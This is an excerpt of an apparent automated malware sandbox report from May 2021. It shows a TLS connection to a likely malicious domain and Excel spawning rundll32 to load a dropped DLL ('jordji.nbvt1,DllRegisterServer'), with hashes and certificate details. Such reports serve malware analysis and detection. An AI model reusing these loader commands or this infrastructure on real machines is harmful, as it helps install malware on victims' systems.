                                                                                    May 4, 2021 13:49:41.279311895 CEST192.185.5.2443192.168.2.2249168CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:13:49:39
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                    Imagebase:0x13f1c0000
                                                                                    File size:27641504 bytes
                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:13:49:47
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                                    Imagebase:0xffb60000
                                                                                    File size:45568 bytes
                                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:13:49:48
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                                    Imagebase:0xffb60000
                                                                                    File size:45568 bytes
                                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >